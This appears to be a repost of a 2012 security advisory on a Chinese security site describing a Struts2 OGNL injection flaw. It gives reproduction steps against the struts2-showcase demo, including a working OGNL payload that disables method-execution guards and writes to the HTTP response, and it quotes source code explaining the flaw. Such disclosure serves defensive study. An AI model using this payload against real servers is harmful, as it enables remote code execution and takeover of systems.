apache struts2 remote code execute

admin 2021年4月3日19:32:27评论28 views字数 1585阅读5分17秒阅读模式

apache struts2 remote code execute, Aug 21 2012 01:54 PM.

this method was published at xcon2012 xcon.xfocus.net.
kxlzx http://www.inbreak.net

flow this and step by step:

1, down load struts2-showcase from struts.apache.org
2, run struts2-showcase.
3, open url: 
http://localhost:8080/struts2-showcase/skill/edit.action?skillName=SPRIN
G-DEV
4, write skill name to %{expr} for example:
%{(#_memberAccess['allowStaticMethodAccess']=true)(#context['xwork.Metho
dAccessor.denyMethodExecution']=false)(#[email protected]
2.ServletActionContext@getResponse().getWriter(),#hackedbykxlzx.println(
'hacked by kxlzx'),#hackedbykxlzx.close())}
5, submit and all will done.

this method:
public static String translateVariables(String expression, ValueStack stack) {
return translateVariables(new char[]{'$', '%'}, expression, stack, String.class, null).toString();
}
look two char "$" and "%"

and
this method:

public static Object translateVariables(char[] openChars, String expression, ValueStack stack, Class asType, ParsedValueEvaluator evaluator, int maxLoopCount) {
// deal with the "pure" expressions first!
//expression = expression.trim();
Object result = expression;
for (char open : openChars) {
.........
while (true) {
..........
String var = expression.substring(start + 2, end);

Object o = stack.findValue(var, asType);
............
if user input is "%{expr}"
this will execute ognl like:
${%{expr}}

this need devloper code like:

${redirectUrl}

or like:
edit.action?skillName=${currentSkill.name}

----------
kxlzx at alibaba security team.
my blog :http://www.inbreak.net

转自:http://www.securityfocus.com/archive/1/523956/30/0/threaded

留言评论(旧系统):

【匿名者】 @ 2012-08-24 11:10:04

这个是新漏洞?

本站回复:

是的,新的,2012.08.21。

文章来源于lcx.cc:apache struts2 remote code execute

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日19:32:27
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   apache struts2 remote code executehttp://cn-sec.com/archives/323335.html

发表评论

匿名网友 填写信息